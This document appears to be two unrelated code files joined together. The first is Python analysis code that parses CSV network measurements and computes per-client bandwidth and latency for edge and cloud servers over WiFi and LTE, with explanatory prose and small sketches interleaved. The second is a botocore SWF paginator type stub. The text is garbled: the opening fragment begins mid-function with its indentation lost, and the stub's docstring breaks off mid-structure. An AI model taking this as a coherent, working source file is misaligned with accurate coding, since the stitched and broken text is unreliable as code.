else:
bucketsize_sec = 1.0 * bucketsize_microsec / 1000000
bps = (1.0 * currentBytes * 8) / bucketsize_sec
Mbps = bps/1000000
ret[lastclientIP].append(Mbps)
#currentBytes = 0
currentBytes = byte
bucket_starttime_microsec = bucket_endtime_microsec
bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
else:
#switch to a new client
pastclientIP.append(clientIP)
#add the last results
if currentBytes == 0:
Mbps = 0
else:
#bucketsize_sec = 1.0 * bucketsize_microsec / 1000000
bucketsize_sec = 1.0 * (previoustimestamp_micros-bucket_starttime_microsec) / 1000000
print (bucketsize_sec)
bps = (1.0 * currentBytes * 8) / bucketsize_sec
Mbps = bps/1000000
ret[lastclientIP].append(Mbps)
lastclientIP = clientIP
lastServerIP = serverIP
currentBytes = byte
ret[clientIP] = []
totalbytes[clientIP] = byte
bucket_starttime_microsec = currenttimestamp_micros
bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
previoustimestamp_micros = currenttimestamp_micros
logger.debug(str(len(ret)) + " clients in ret")
print ("read " + str(linecount) + " from " + inputfile + " (including headers)")
return ret, totalbytes


def readbandwidthvalues_self_perclient(config_parser, section, inputfile, server, conntype, logger):
    assert "LEGACY" not in inputfile
    assert "SORTED" in inputfile
    assert "self" in inputfile
    #ret = {}
    ret = OrderedDict()
    if conntype == "wifi":
        client_subnetaddr = config_parser.get(section, "client_subnetaddr_wifi")
        edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_wifi")
        remoteserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_wifi")
    elif conntype == "lte":
        client_subnetaddr = config_parser.get(section, "client_subnetaddr_lte")
        edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_lte")
        remoteserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_lte")
    else:
        print("unknown connection type " + str(conntype))
        sys.exit(1)
    with open(inputfile, "r") as csvinput:
        csvreader = csv.reader(csvinput, delimiter=",")
        linecount = 0
        for row in csvreader:
            if linecount == 0 or linecount == 1:
                linecount += 1
                continue
            if linecount == 2:
                try:
                    #columns: ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,Direction,Protocol,
                    #         Mode,Type,ID,Timestamp,Bytes
                    assert row[13] == "Bytes"
                    assert row[6] == "Keyword"
                    assert row[2] == "ClientIP"
                    assert row[3] == "ClientPort"
                    assert row[4] == "ServerIP"
                    assert row[5] == "ServerPort"
                except Exception as e:
                    print(e)
                    print(row)
                    sys.exit(1)
                linecount += 1
                #print row
                continue
            measuredbytes = row[13]
            keyword = row[6]
            clientIP = row[2]
            clientPort = row[3]
            serverIP = row[4]
            serverPort = row[5]
            currentTestID = ""
            try:
                assert row[2][:len(client_subnetaddr)].strip() == client_subnetaddr.strip()
                assert conntype.strip() in inputfile
            except Exception:
                print(conntype)
                print(inputfile)
                print(row[2][:len(client_subnetaddr)] + "!=" + client_subnetaddr)
                linecount += 1
                continue
            linecount += 1
            if (server == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
                    (server == "cloud" and serverIP[:len(remoteserver_subnetaddr)] == remoteserver_subnetaddr):
                if clientIP not in ret:
                    print("first " + str(clientIP))
                    ret[clientIP] = []
                bandwidthkbps = float(row[13])
                bandwidthMbps = bandwidthkbps / 1000
                #print (bandwidthMbps)
                #print (row)
                ret[clientIP].append(bandwidthMbps)
            #else:
            #    print("discarded" + str(row))
    print("read " + str(linecount) + " from " + inputfile + " (including headers)")
    return ret
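The readers above all assume the same preamble: line 0 holds the query, line 1 its arguments, and line 2 the column names, with data starting at line 3. A minimal sketch of that layout on an invented in-memory sample (all values hypothetical):

```python
import csv
import io

#invented sample mimicking the expected file layout: query, arguments, header, data
sample = (
    "query\n"
    "arguments\n"
    "ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,Direction,Protocol,Mode,Type,ID,Timestamp,Bytes\n"
    "1,0,10.0.0.5,5000,10.1.0.9,80,kw,down,tcp,mode,type,1,1000000,2000\n"
)
rows = list(csv.reader(io.StringIO(sample), delimiter=","))
#same sanity checks as the functions above
assert rows[2][13] == "Bytes" and rows[2][2] == "ClientIP"
#row[13] is treated as kbps by the readers above, so /1000 yields Mbps
bandwidthMbps = float(rows[3][13]) / 1000
```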


def readbandwidthvalues_self_timeplot(config_parser, section, inputfile, segment, conntype, logger):
    assert "LEGACY" not in inputfile
    assert "SORTED" in inputfile
    assert "self" in inputfile
    client_subnetaddr, edgeserver_subnetaddr, cloudserver_subnetaddr = _get_subnetaddresses(
        config_parser=config_parser, section=section, conntype=conntype,
        logger=logger)
    evaluate_fragmentquality = config_parser.getboolean(section, "evaluate_fragmentquality")
    logger.debug("inputfile = " + str(inputfile))
    logger.debug("connectiontype = " + str(conntype))
    logger.debug("segment = " + segment)
    logger.debug("client_subnetaddr = " + str(client_subnetaddr))
    logger.debug("edgeserver_subnetaddr = " + str(edgeserver_subnetaddr))
    logger.debug("cloudserver_subnetaddr = " + str(cloudserver_subnetaddr))
    logger.debug("evaluate_fragmentquality = " + str(evaluate_fragmentquality))
    ret = OrderedDict()
    with open(inputfile, "r") as csvinput:
        csvreader = csv.reader(csvinput, delimiter=",")
        linecount = 0
        for row in csvreader:
            #line #0 contains the query
            #line #1 contains its arguments
            if linecount == 0 or linecount == 1:
                linecount += 1
                continue
            #line #2 contains the name of each column:
            # ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,Direction,Protocol,Mode,Type,
            # ID,Timestamp,Bytes
            if linecount == 2:
                try:
                    assert row[13] == "Bytes"
                    assert row[6] == "Keyword"
                    assert row[2] == "ClientIP"
                    assert row[3] == "ClientPort"
                    assert row[4] == "ServerIP"
                except Exception:
                    logger.critical("unknown columns: " + str(row))
                    logger.critical("EXIT")
                    sys.exit(1)
                linecount += 1
                #print row
                continue
            try:
                measuredbytes = row[13]
                timestamp_micros = row[12]
                keyword = row[6]
                clientIP = row[2]
                clientPort = row[3]
                serverIP = row[4]
                assert clientIP[:len(client_subnetaddr)].strip() == client_subnetaddr.strip()
                assert conntype.strip() in inputfile
            except Exception:
                print(row)
                print(inputfile)
                logger.critical("conntype: " + str(conntype))
                logger.critical("inputfile = " + str(inputfile))
                logger.critical(str(row[2][:len(client_subnetaddr)]) + "!=" + str(client_subnetaddr))
                logger.critical("EXIT")
                sys.exit(1)
            linecount += 1
            if (segment == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
                    (segment == "cloud" and serverIP[:len(cloudserver_subnetaddr)] == cloudserver_subnetaddr):
                if clientIP not in ret:
                    ret[clientIP] = []
                bandwidthkbps = float(measuredbytes)
                bandwidthMbps = bandwidthkbps / 1000
                date = datetime.datetime.fromtimestamp(float(timestamp_micros) / 1000000.0)
                if evaluate_fragmentquality:
                    ret[clientIP].append({"bandwidthMbps": bandwidthMbps, "clientPort": clientPort,
                                          "timestamp": date, "fragmentquality": row[14]})
                else:
                    ret[clientIP].append({"bandwidthMbps": bandwidthMbps, "clientPort": clientPort,
                                          "timestamp": date})
    print("read " + str(linecount) + " from " + inputfile + " (including headers)")
    return ret
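Timestamps in these files are microseconds since the epoch, converted with `datetime.datetime.fromtimestamp(ts / 1000000.0)` as above. A quick check of that conversion, with invented timestamps:

```python
import datetime

#two hypothetical packet timestamps five seconds apart, in microseconds since the epoch
t1_micros = 1500000000000000.0
t2_micros = t1_micros + 5000000.0
d1 = datetime.datetime.fromtimestamp(t1_micros / 1000000.0)
d2 = datetime.datetime.fromtimestamp(t2_micros / 1000000.0)
#the datetime difference recovers the microsecond gap
delta_seconds = (d2 - d1).total_seconds()
```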


def readbandwidthvalues_mim_timeplot(config_parser, section, inputfile, segment, conntype, logger):
    assert "LEGACY" not in inputfile
    assert "SORTED" in inputfile
    assert "mim" in inputfile
    client_subnetaddr, edgeserver_subnetaddr, cloudserver_subnetaddr = _get_subnetaddresses(
        config_parser=config_parser, section=section, conntype=conntype,
        logger=logger)
    logger.debug("inputfile = " + str(inputfile))
    logger.debug("connectiontype = " + str(conntype))
    logger.debug("segment = " + segment)
    logger.debug("client_subnetaddr = " + str(client_subnetaddr))
    logger.debug("edgeserver_subnetaddr = " + str(edgeserver_subnetaddr))
    logger.debug("cloudserver_subnetaddr = " + str(cloudserver_subnetaddr))
    ret = OrderedDict()
    with open(inputfile, "r") as csvinput:
        csvreader = csv.reader(csvinput, delimiter=",")
        linecount = 0
        for row in csvreader:
            #line #0 contains the query
            #line #1 contains its arguments
            if linecount == 0 or linecount == 1:
                linecount += 1
                continue
            #line #2 contains the name of each column:
            # ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,Direction,Protocol,Mode,Type,
            # ID,Timestamp,Bytes
            if linecount == 2:
                try:
                    assert row[13] == "Bytes"
                    assert row[6] == "Keyword"
                    assert row[2] == "ClientIP"
                    assert row[3] == "ClientPort"
                    assert row[4] == "ServerIP"
                except Exception:
                    logger.critical("unknown columns: " + str(row))
                    logger.critical("EXIT")
                    sys.exit(1)
                linecount += 1
                #print row
                continue
            #measuredbytes = row[13]
            timestamp_micros = row[12]
            #keyword = row[6]
            clientIP = row[2]
            #clientPort = row[3]
            serverIP = row[4]
            try:
                assert clientIP[:len(client_subnetaddr)].strip() == client_subnetaddr.strip()
                assert conntype.strip() in inputfile
            except Exception:
                logger.critical("conntype: " + str(conntype))
                logger.critical("inputfile = " + str(inputfile))
                logger.critical(str(clientIP[:len(client_subnetaddr)]) + "!=" + str(client_subnetaddr))
                logger.critical("EXIT")
                sys.exit(1)
            linecount += 1
            if (segment == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
                    (segment == "cloud" and serverIP[:len(cloudserver_subnetaddr)] == cloudserver_subnetaddr):
                if clientIP not in ret:
                    ret[clientIP] = []
                date = datetime.datetime.fromtimestamp(float(timestamp_micros) / 1000000.0)
                ret[clientIP].append({"timestamp": date})
    print("read " + str(linecount) + " from " + inputfile + " (including headers)")
    return ret
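`ret` is an `OrderedDict` so that clients are reported in first-seen order while rows for the same client keep accumulating under one key; a minimal sketch of that pattern with invented IPs:

```python
from collections import OrderedDict

#hypothetical arrival order: two clients, interleaved
arrivals = [("10.0.0.2", 1000000.0), ("10.0.0.3", 1500000.0), ("10.0.0.2", 2000000.0)]
ret = OrderedDict()
for clientIP, timestamp_micros in arrivals:
    if clientIP not in ret:
        ret[clientIP] = []
    ret[clientIP].append({"timestamp": timestamp_micros})
```

Client 10.0.0.2 stays first in the iteration order even though 10.0.0.3 arrives in between its two packets.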


def readbandwidthvalues_mim_timeplot_usingfixbuckets(config_parser, section, inputfile, segment, conntype,
                                                     logger, bucketsize_microsec):
    assert "LEGACY" not in inputfile
    assert "SORTED" in inputfile
    assert "mim" in inputfile
    client_subnetaddr, edgeserver_subnetaddr, cloudserver_subnetaddr = _get_subnetaddresses(
        config_parser=config_parser, section=section, conntype=conntype,
        logger=logger)
    logger.debug("inputfile = " + str(inputfile))
    logger.debug("connectiontype = " + str(conntype))
    logger.debug("segment = " + segment)
    logger.debug("client_subnetaddr = " + str(client_subnetaddr))
    logger.debug("edgeserver_subnetaddr = " + str(edgeserver_subnetaddr))
    logger.debug("cloudserver_subnetaddr = " + str(cloudserver_subnetaddr))
    print(segment)
    print("bucketsize_microsec " + str(bucketsize_microsec))
    ret = OrderedDict()
    lastclientIP = ""
    with open(inputfile, "r") as csvinput:
        csvreader = csv.reader(csvinput, delimiter=",")
        linecount = 0
        for row in csvreader:
            #line #0 contains the query
            #line #1 contains its arguments
            if linecount == 0 or linecount == 1:
                linecount += 1
                continue
            #line #2 contains the name of each column:
            # ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,Direction,Protocol,Mode,Type,
            # ID,Timestamp,Bytes
            if linecount == 2:
                try:
                    assert row[13] == "Bytes"
                    assert row[6] == "Keyword"
                    assert row[2] == "ClientIP"
                    assert row[3] == "ClientPort"
                    assert row[4] == "ServerIP"
                except Exception:
                    logger.critical("unknown columns: " + str(row))
                    logger.critical("EXIT")
                    sys.exit(1)
                linecount += 1
                #print row
                continue
            clientIP = row[2]
            serverIP = row[4]
            byte = float(row[13])
            currenttimestamp_micros = float(row[12])
            try:
                assert clientIP[:len(client_subnetaddr)].strip() == client_subnetaddr.strip()
                assert conntype.strip() in inputfile
            except Exception:
                logger.critical("conntype: " + str(conntype))
                logger.critical("inputfile = " + str(inputfile))
                logger.critical(str(clientIP[:len(client_subnetaddr)]) + "!=" + str(client_subnetaddr))
                logger.critical("EXIT")
                sys.exit(1)
            linecount += 1
            if (segment == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
                    (segment == "cloud" and serverIP[:len(cloudserver_subnetaddr)] == cloudserver_subnetaddr):
                if clientIP not in ret:
                    #new clientIP
                    ret[clientIP] = []
                    if len(ret) == 1:
                        #this is the first row containing results for the first target server
                        lastclientIP = clientIP
                        currentBytes = byte
                        bucket_starttime_microsec = currenttimestamp_micros
                        bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
                    else:
                        #switch to a new client with a different IP
                        #add the results of the previous client
                        if currentBytes == 0:
                            Mbps = 0
                        else:
                            bucketsize_sec = 1.0 * bucketsize_microsec / 1000000
                            bps = (1.0 * currentBytes * 8) / bucketsize_sec
                            Mbps = bps / 1000000
                        time_datetime = datetime.datetime.fromtimestamp(float(bucket_starttime_microsec + (bucketsize_microsec / 2)) / 1000000.0)
                        ret[lastclientIP].append({"bandwidthMbps": Mbps, "timestamp": time_datetime})
                        lastclientIP = clientIP
                        #start the new client's first bucket with this packet's bytes
                        currentBytes = byte
                        bucket_starttime_microsec = currenttimestamp_micros
                        bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
                    continue
                elif lastclientIP == clientIP:
                    if currenttimestamp_micros < bucket_endtime_microsec:
                        #packet received within the bucketsize_microsec interval
                        currentBytes += byte
                    else:
                        #packet received within the next bucketsize_microsec interval
                        if currentBytes == 0:
                            Mbps = 0
                        else:
                            bucketsize_sec = 1.0 * bucketsize_microsec / 1000000
                            bps = (1.0 * currentBytes * 8) / bucketsize_sec
                            Mbps = bps / 1000000
                        time_datetime = datetime.datetime.fromtimestamp(float(bucket_starttime_microsec + (bucketsize_microsec / 2)) / 1000000.0)
                        ret[clientIP].append({"bandwidthMbps": Mbps, "timestamp": time_datetime})
                        currentBytes = byte
                        bucket_starttime_microsec = bucket_endtime_microsec
                        bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
                    continue
                else:
                    print("WE SHOULD NEVER GET HERE")
                    assert False
    #add the last results
    if currentBytes == 0:
        Mbps = 0
    else:
        bucketsize_sec = 1.0 * bucketsize_microsec / 1000000
        bps = (1.0 * currentBytes * 8) / bucketsize_sec
        Mbps = bps / 1000000
    time_datetime = datetime.datetime.fromtimestamp(float(bucket_starttime_microsec + (bucketsize_microsec / 2)) / 1000000.0)
    ret[lastclientIP].append({"bandwidthMbps": Mbps, "timestamp": time_datetime})
    print("read " + str(linecount) + " from " + inputfile + " (including headers)")
    return ret
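For a single client, the fixed-bucket loop above reduces to: accumulate bytes while a sample falls inside the current window, otherwise emit one Mbps value and advance the window by exactly one `bucketsize_microsec` (the window is not fast-forwarded over empty gaps, mirroring the loop above), then flush the final bucket. A standalone sketch; `bucketize` is our name, not part of this module:

```python
def bucketize(samples, bucketsize_microsec):
    #samples: (timestamp_micros, nbytes) pairs for ONE client, sorted by timestamp
    out = []
    if not samples:
        return out
    first_ts, first_bytes = samples[0]
    bucket_endtime_microsec = first_ts + bucketsize_microsec
    currentBytes = first_bytes
    bucketsize_sec = bucketsize_microsec / 1000000.0
    for timestamp_micros, nbytes in samples[1:]:
        if timestamp_micros < bucket_endtime_microsec:
            #still inside the current bucket
            currentBytes += nbytes
        else:
            #close the current bucket and start the next one
            out.append((currentBytes * 8.0 / bucketsize_sec) / 1000000.0)
            currentBytes = nbytes
            bucket_endtime_microsec += bucketsize_microsec
    #flush the last bucket
    out.append((currentBytes * 8.0 / bucketsize_sec) / 1000000.0)
    return out
```

With a 1-second bucket, 250000 bytes in the first window and 125000 in the next yield 2.0 and 1.0 Mbps respectively.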


def readlatencyvalues_noisemim(config_parser, section, inputfile, connectiontype, segment, noise):
    assert "SORTED_LEGACY" in inputfile
    assert "mim" in inputfile
    ret = []
    client_subnetaddr = config_parser.get(section, "client_subnetaddr_" + connectiontype)
    edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_" + connectiontype)
    remoteserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_" + connectiontype)
    with open(inputfile, "r") as csvinput:
        csvreader = csv.reader(csvinput, delimiter=",")
        linecount = 0
        for row in csvreader:
            if linecount == 0 or linecount == 1:
                linecount += 1
                continue
            if linecount == 2:
                try:
                    assert row[13] == "latency"
                    assert row[6] == "Keyword"
                    assert row[4] == "ServerIP"
                except Exception:
                    print(row)
                    sys.exit(1)
                linecount += 1
                #print row
                continue
            linecount += 1
            try:
                latency = float(row[13])
            except Exception:
                print(inputfile)
                for iii in range(0, len(row)):
                    print(str(iii) + ": " + str(row[iii]))
                sys.exit(1)
            serverIP = row[4]
            if (segment == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
                    (segment == "remote" and serverIP[:len(remoteserver_subnetaddr)] == remoteserver_subnetaddr):
                #print str(latency/1000)
                if latency != 0:
                    ret.append(latency / 1000)
    #print ret
    print("read " + str(linecount) + " from " + inputfile + " (including headers)")
    return ret
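The `latency / 1000` above rescales the raw latency column by a factor of 1000 before reporting (microseconds to milliseconds, assuming the column uses the same microsecond convention as the other timestamps in this file), and zero readings are dropped. A minimal sketch with invented samples:

```python
#hypothetical raw latency samples; zero entries are discarded, as above
raw_latencies = [2500.0, 0.0, 10000.0]
ret = []
for latency in raw_latencies:
    if latency != 0:
        ret.append(latency / 1000)
```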
from typing import Dict
from botocore.paginate import Paginator
class GetWorkflowExecutionHistory(Paginator):
    def paginate(self, domain: str, execution: Dict, reverseOrder: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`SWF.Client.get_workflow_execution_history`.

        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/swf-2012-01-25/GetWorkflowExecutionHistory>`_

        **Request Syntax**
        ::

            response_iterator = paginator.paginate(
                domain='string',
                execution={
                    'workflowId': 'string',
                    'runId': 'string'
                },
                reverseOrder=True|False,
                PaginationConfig={
                    'MaxItems': 123,
                    'PageSize': 123,
                    'StartingToken': 'string'
                }
            )

        **Response Syntax**
        ::

            {
                'events': [
                    {
                        'eventTimestamp': datetime(2015, 1, 1),
                        'eventType': 'WorkflowExecutionStarted'|'WorkflowExecutionCancelRequested'|'WorkflowExecutionCompleted'|'CompleteWorkflowExecutionFailed'|'WorkflowExecutionFailed'|'FailWorkflowExecutionFailed'|'WorkflowExecutionTimedOut'|'WorkflowExecutionCanceled'|'CancelWorkflowExecutionFailed'|'WorkflowExecutionContinuedAsNew'|'ContinueAsNewWorkflowExecutionFailed'|'WorkflowExecutionTerminated'|'DecisionTaskScheduled'|'DecisionTaskStarted'|'DecisionTaskCompleted'|'DecisionTaskTimedOut'|'ActivityTaskScheduled'|'ScheduleActivityTaskFailed'|'ActivityTaskStarted'|'ActivityTaskCompleted'|'ActivityTaskFailed'|'ActivityTaskTimedOut'|'ActivityTaskCanceled'|'ActivityTaskCancelRequested'|'RequestCancelActivityTaskFailed'|'WorkflowExecutionSignaled'|'MarkerRecorded'|'RecordMarkerFailed'|'TimerStarted'|'StartTimerFailed'|'TimerFired'|'TimerCanceled'|'CancelTimerFailed'|'StartChildWorkflowExecutionInitiated'|'StartChildWorkflowExecutionFailed'|'ChildWorkflowExecutionStarted'|'ChildWorkflowExecutionCompleted'|'ChildWorkflowExecutionFailed'|'ChildWorkflowExecutionTimedOut'|'ChildWorkflowExecutionCanceled'|'ChildWorkflowExecutionTerminated'|'SignalExternalWorkflowExecutionInitiated'|'SignalExternalWorkflowExecutionFailed'|'ExternalWorkflowExecutionSignaled'|'RequestCancelExternalWorkflowExecutionInitiated'|'RequestCancelExternalWorkflowExecutionFailed'|'ExternalWorkflowExecutionCancelRequested'|'LambdaFunctionScheduled'|'LambdaFunctionStarted'|'LambdaFunctionCompleted'|'LambdaFunctionFailed'|'LambdaFunctionTimedOut'|'ScheduleLambdaFunctionFailed'|'StartLambdaFunctionFailed',
                        'eventId': 123,
                        'workflowExecutionStartedEventAttributes': {
                            'input': 'string',
                            'executionStartToCloseTimeout': 'string',
                            'taskStartToCloseTimeout': 'string',
                            'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON',
                            'taskList': {
                                'name': 'string'
                            },
                            'taskPriority': 'string',
                            'workflowType': {
                                'name': 'string',
                                'version': 'string'
                            },
                            'tagList': [
                                'string',
                            ],
                            'continuedExecutionRunId': 'string',
                            'parentWorkflowExecution': {
                                'workflowId': 'string',
                                'runId': 'string'
                            },
                            'parentInitiatedEventId': 123,
                            'lambdaRole': 'string'
                        },
                        'workflowExecutionCompletedEventAttributes': {
                            'result': 'string',
                            'decisionTaskCompletedEventId': 123
                        },
                        'completeWorkflowExecutionFailedEventAttributes': {
                            'cause': 'UNHANDLED_DECISION'|'OPERATION_NOT_PERMITTED',
                            'decisionTaskCompletedEventId': 123
                        },
                        'workflowExecutionFailedEventAttributes': {
                            'reason': 'string',
                            'details': 'string',
                            'decisionTaskCompletedEventId': 123
                        },
                        'failWorkflowExecutionFailedEventAttributes': {
                            'cause': 'UNHANDLED_DECISION'|'OPERATION_NOT_PERMITTED',
                            'decisionTaskCompletedEventId': 123
                        },
                        'workflowExecutionTimedOutEventAttributes': {
                            'timeoutType': 'START_TO_CLOSE',
                            'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON'
                        },
                        'workflowExecutionCanceledEventAttributes': {
                            'details': 'string',
                            'decisionTaskCompletedEventId': 123
                        },
                        'cancelWorkflowExecutionFailedEventAttributes': {
                            'cause': 'UNHANDLED_DECISION'|'OPERATION_NOT_PERMITTED',
                            'decisionTaskCompletedEventId': 123
                        },
                        'workflowExecutionContinuedAsNewEventAttributes': {
                            'input': 'string',
                            'decisionTaskCompletedEventId': 123,
                            'newExecutionRunId': 'string',
                            'executionStartToCloseTimeout': 'string',
                            'taskList': {
                                'name': 'string'
                            },
                            'taskPriority': 'string',
                            'taskStartToCloseTimeout': 'string',
                            'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON',
                            'tagList': [
                                'string',
                            ],
                            'workflowType': {
                                'name': 'string',
                                'version': 'string'
                            },
                            'lambdaRole': 'string'
                        },
                        'continueAsNewWorkflowExecutionFailedEventAttributes': {
                            'cause': 'UNHANDLED_DECISION'|'WORKFLOW_TYPE_DEPRECATED'|'WORKFLOW_TYPE_DOES_NOT_EXIST'|'DEFAULT_EXECUTION_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_TASK_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_TASK_LIST_UNDEFINED'|'DEFAULT_CHILD_POLICY_UNDEFINED'|'CONTINUE_AS_NEW_WORKFLOW_EXECUTION_RATE_EXCEEDED'|'OPERATION_NOT_PERMITTED',
                            'decisionTaskCompletedEventId': 123
                        },
                        'workflowExecutionTerminatedEventAttributes': {
                            'reason': 'string',
                            'details': 'string',
                            'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON',
                            'cause': 'CHILD_POLICY_APPLIED'|'EVENT_LIMIT_EXCEEDED'|'OPERATOR_INITIATED'
                        },
                        'workflowExecutionCancelRequestedEventAttributes': {
                            'externalWorkflowExecution': {
                                'workflowId': 'string',
                                'runId': 'string'
                            },
                            'externalInitiatedEventId': 123,
                            'cause': 'CHILD_POLICY_APPLIED'
                        },
                        'decisionTaskScheduledEventAttributes': {
                            'taskList': {
                                'name': 'string'
                            },
                            'taskPriority': 'string',
                            'startToCloseTimeout': 'string'
                        },
                        'decisionTaskStartedEventAttributes': {
                            'identity': 'string',
                            'scheduledEventId': 123
                        },
                        'decisionTaskCompletedEventAttributes': {
                            'executionContext': 'string',
                            'scheduledEventId': 123,
                            'startedEventId': 123
                        },
                        'decisionTaskTimedOutEventAttributes': {
                            'timeoutType': 'START_TO_CLOSE',
                            'scheduledEventId': 123,
                            'startedEventId': 123
                        },
                        'activityTaskScheduledEventAttributes': {
                            'activityType': {
                                'name': 'string',
                                'version': 'string'
                            },
                            'activityId': 'string',
                            'input': 'string',
                            'control': 'string',
                            'scheduleToStartTimeout': 'string',
                            'scheduleToCloseTimeout': 'string',
                            'startToCloseTimeout': 'string',
                            'taskList': {
                                'name': 'string'
                            },
                            'taskPriority': 'string',
                            'decisionTaskCompletedEventId': 123,
                            'heartbeatTimeout': 'string'
                        },
                        'activityTaskStartedEventAttributes': {
                            'identity': 'string',
                            'scheduledEventId': 123
                        },
                        'activityTaskCompletedEventAttributes': {
                            'result': 'string',
                            'scheduledEventId': 123,
                            'startedEventId': 123
                        },
                        'activityTaskFailedEventAttributes': {
                            'reason': 'string',
                            'details': 'string',
                            'scheduledEventId': 123,
                            'startedEventId': 123
                        },
                        'activityTaskTimedOutEventAttributes': {
                            'timeoutType': 'START_TO_CLOSE'|'SCHEDULE_TO_START'|'SCHEDULE_TO_CLOSE'|'HEARTBEAT',
                            'scheduledEventId': 123,
                            'startedEventId': 123,
                            'details': 'string'
                        },
                        'activityTaskCanceledEventAttributes': {
                            'details': 'string',
                            'scheduledEventId': 123,
                            'startedEventId': 123,
                            'latestCancelRequestedEventId': 123
                        },
                        'activityTaskCancelRequestedEventAttributes': {
                            'decisionTaskCompletedEventId': 123,
                            'activityId': 'string'
                        },
                        'workflowExecutionSignaledEventAttributes': {
                            'signalName': 'string',
                            'input': 'string',
                            'externalWorkflowExecution': {
                                'workflowId': 'string',
                                'runId': 'string'
                            },
                            'externalInitiatedEventId': 123
                        },
                        'markerRecordedEventAttributes': {
                            'markerName': 'string',
                            'details': 'string',
                            'decisionTaskCompletedEventId': 123
                        },
                        'recordMarkerFailedEventAttributes': {
                            'markerName': 'string',
                            'cause': 'OPERATION_NOT_PERMITTED',
                            'decisionTaskCompletedEventId': 123
                        },
                        'timerStartedEventAttributes': {
                            'timerId': 'string',
                            'control': 'string',
                            'startToFireTimeout': 'string',
                            'decisionTaskCompletedEventId': 123
                        },
                        'timerFiredEventAttributes': {
                            'timerId': 'string',
                            'startedEventId': 123
                        },
                        'timerCanceledEventAttributes': {
                            'timerId': 'string',
                            'startedEventId': 123,
                            'decisionTaskCompletedEventId': 123
                        },
                        'startChildWorkflowExecutionInitiatedEventAttributes': {
                            'workflowId': 'string',
                            'workflowType': {
                                'name': 'string',
                                'version': 'string'
                            },
                            'control': 'string',
                            'input': 'string',
                            'executionStartToCloseTimeout': 'string',
                            'taskList': {
                                'name': 'string'
                            },
                            'taskPriority': 'string',
                            'decisionTaskCompletedEventId': 123,
                            'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON',
                            'taskStartToCloseTimeout': 'string',
                            'tagList': [
                                'string',
                            ],
                            'lambdaRole': 'string'
                        },
                        'childWorkflowExecutionStartedEventAttributes': {
                            'workflowExecution': {
                                'workflowId': 'string',
                                'runId': 'string'
                            },
                            'workflowType': {
                                'name': 'string',
                                'version': 'string'
                            },
                            'initiatedEventId': 123
                        },
                        'childWorkflowExecutionCompletedEventAttributes': {
                            'workflowExecution': {
                                'workflowId': 'string',
                                'runId': 'string'
                            },
                            'workflowType': {
                                'name': 'string',
                                'version': 'string'
                            },
                            'result': 'string',
                            'initiatedEventId': 123,
                            'startedEventId': 123
                        },
                        'childWorkflowExecutionFailedEventAttributes': {
                            'workflowExecution': {
                                'workflowId': 'string',
                                'runId': 'string'
                            },
                            'workflowType': {
                                'name': 'string',
                                'version': 'string'
                            },
                            'reason': 'string',
                            'details': 'string',
                            'initiatedEventId': 123,
                            'startedEventId': 123
                        },
                        'childWorkflowExecutionTimedOutEventAttributes': {
                            'workflowExecution': {
                                'workflowId': 'string',
                                'runId': 'string'
                            },
                            'workflowType': {
                                'name': 'string',
                                'version': 'string'
                            },
                            'timeoutType': 'START_TO_CLOSE',
                            'initiatedEventId': 123,
                            'startedEventId': 123
                        },
                        'childWorkflowExecutionCanceledEventAttributes': {
                            'workflowExecution': {
                                'workflowId': 'string',
                                'runId': 'string'
                            },
                            'workflowType': {
                                'name': 'string',
                                'version': 'string'
                            },
                            'details': 'string',
                            'initiatedEventId': 123,
                            'startedEventId': 123
                        },
                        'childWorkflowExecutionTerminatedEventAttributes': {
                            'workflowExecution': {
                                'workflowId': 'string',
                                'runId': 'string'
                            },
                            'workflowType': {
                                'name': 'string',
                                'version': 'string'
                            },
                            'initiatedEventId': 123,
                            'startedEventId': 123
                        },
                        'signalExternalWorkflowExecutionInitiatedEventAttributes': {
                            'workflowId': 'string',
                            'runId': 'string',
                            'signalName': 'string',
                            'input': 'string',
                            'decisionTaskCompletedEventId': 123,
                            'control': 'string'
                        },
                        'externalWorkflowExecutionSignaledEventAttributes': {
                            'workflowExecution': {
                                'workflowId': 'string',
                                'runId': 'string'
                            },
                            'initiatedEventId': 123
                        },
                        'signalExternalWorkflowExecutionFailedEventAttributes': {
                            'workflowId': 'string',
                            'runId': 'string',
                            'cause': 'UNKNOWN_EXTERNAL_WORKFLOW_EXECUTION'|'SIGNAL_EXTERNAL_WORKFLOW_EXECUTION_RATE_EXCEEDED'|'OPERATION_NOT_PERMITTED',
                            'initiatedEventId': 123,
                            'decisionTaskCompletedEventId': 123,
                            'control': 'string'
                        },
